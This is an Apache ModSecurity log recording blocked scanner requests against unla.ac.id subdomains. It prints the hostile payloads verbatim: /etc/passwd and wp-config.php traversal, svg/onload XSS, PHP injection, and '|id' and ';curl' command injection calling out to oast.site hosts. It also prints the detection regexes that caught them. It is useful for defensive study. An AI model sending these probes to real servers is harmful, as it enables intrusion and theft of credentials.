[Tue Aug 29 11:41:27.519197 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAQkBdoAAAAC"]
[Tue Aug 29 11:41:27.570853 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO1298Co-f0AAAQSWo0AAAA0"]
[Tue Aug 29 11:41:27.602222 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1298Co-f0AAAUKhGgAAABC"]
[Tue Aug 29 11:41:27.606009 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAcoNXUAAAAF"]
[Tue Aug 29 11:41:27.623172 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAUKhGkAAABC"]
[Tue Aug 29 11:41:27.628233 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAQkBd4AAAAC"]
[Tue Aug 29 11:41:27.693154 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAcrijsAAAAB"]
[Tue Aug 29 11:41:28.362727 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26grm8ctmzwagnuw.oast.site found within TX:1: cjmnbitjmimt14dgn26grm8ctmzwagnuw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAYf-TsAAAAD"]
[Tue Aug 29 11:41:28.366051 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g869w7a8rkmmyp.oast.site found within TX:1: cjmnbitjmimt14dgn26g869w7a8rkmmyp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAc0NhAAAAAM"]
[Tue Aug 29 11:41:28.413504 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gt8jht4irgnjyx.oast.site found within TX:1: cjmnbitjmimt14dgn26gt8jht4irgnjyx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAcrij4AAAAB"]
[Tue Aug 29 11:41:28.463646 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO12@MCo-f0AAAcbSHAAAAAv"]
[Tue Aug 29 11:41:28.476727 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g3kb6jo5r8bdtq.oast.site found within TX:1: cjmnbitjmimt14dgn26g3kb6jo5r8bdtq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAaZ9ukAAAAo"]
[Tue Aug 29 11:41:28.505346 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO12@MCo-f0AAAcbSHIAAAAv"]
[Tue Aug 29 11:41:28.558690 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26girh37asrmi3kw.oast.site found within TX:1: cjmnbitjmimt14dgn26girh37asrmi3kw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAc2dT4AAAAN"]
[Tue Aug 29 11:41:29.438311 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gmdo6tbupnperk.oast.site found within TX:1: cjmnbitjmimt14dgn26gmdo6tbupnperk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@cCo-f0AAAUKhHQAAABC"]
[Tue Aug 29 11:41:29.488248 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO12@cCo-f0AAAUKhHYAAABC"]
[Tue Aug 29 11:41:30.379586 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26g4idz3ocr3axbp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAcoNYQAAAAF"]
[Tue Aug 29 11:41:30.379982 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gfkqyb5kcgqpge.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAQkBe0AAAAC"]
[Tue Aug 29 11:41:30.385059 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26g53itpnwbbyb1q.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAYf-T4AAAAD"]
[Tue Aug 29 11:41:30.390149 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gips4eahqijnrd.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAc0NhYAAAAM"]
[Tue Aug 29 11:41:30.543102 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAaZ9vAAAAAo"]
[Tue Aug 29 11:41:30.650004 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAQSWpkAAAA0"]
[Tue Aug 29 11:41:30.677515 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAUKhHsAAABC"]
[Tue Aug 29 11:41:30.698667 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAcbSIAAAAAv"]
[Tue Aug 29 11:41:30.699711 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAaZ9vMAAAAo"]
[Tue Aug 29 11:41:30.700740 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gfqq4budm3ckm3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAUKhHwAAABC"]
[Tue Aug 29 11:41:31.416762 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gkzfuajdxtfi71.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@8Co-f0AAAcqJO0AAAAG"]
[Tue Aug 29 11:41:31.559764 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@8Co-f0AAAcqJPQAAAAG"]
